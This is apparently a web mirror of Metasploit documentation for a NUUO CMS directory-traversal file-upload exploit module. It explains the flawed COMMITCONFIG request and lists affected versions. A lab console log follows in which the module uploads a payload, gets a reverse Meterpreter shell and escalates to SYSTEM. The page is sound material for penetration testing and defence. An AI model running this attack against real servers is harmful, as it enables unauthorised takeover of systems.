CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md
Views: 1904

Vulnerable Application

Nuuo CMS Authenticated Arbitrary File Upload

The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below:

COMMITCONFIG NUCM/1.0
User-Session-No: <session-number>
Filename: <filename>
FileType: <number>
Content-Lenght: <file-length>

<FILE_DATA>

The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\..\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server.

This vulnerability is exploitable in CMS versions up to and including v2.4.

This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided.

NUUO Central Management Server (CMS): all versions below 2.5

  • 1.5.2 OK

  • 2.1.0 OK

  • 2.3.2 OK

  • 2.4.0 OK

  • 2.6.0 FAIL (vuln fixed?)

  • 2.9.0 FAIL

  • 2.10.0 FAIL

Scenarios

Testing on Windows 10 Pro x64 running NCS Server 2.4.0

msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true
verbose => true
msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG
[*] 172.22.222.200:5180 - Uploading payload...
[*] 172.22.222.200:5180 - Sleeping 15 seconds...
[*] 172.22.222.200:5180 - Sending SENDLICFILE request, shell incoming!
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:49674) at 2019-02-19 05:46:51 -0600

meterpreter > 
[!] 172.22.222.200:5180 - Please wait a bit while we clean up
[+] 172.22.222.200:5180 - Successfully restored LicenseTool.dll!
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
[+] 172.22.222.200:5180 - We should have SYSTEM now, enjoy your shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >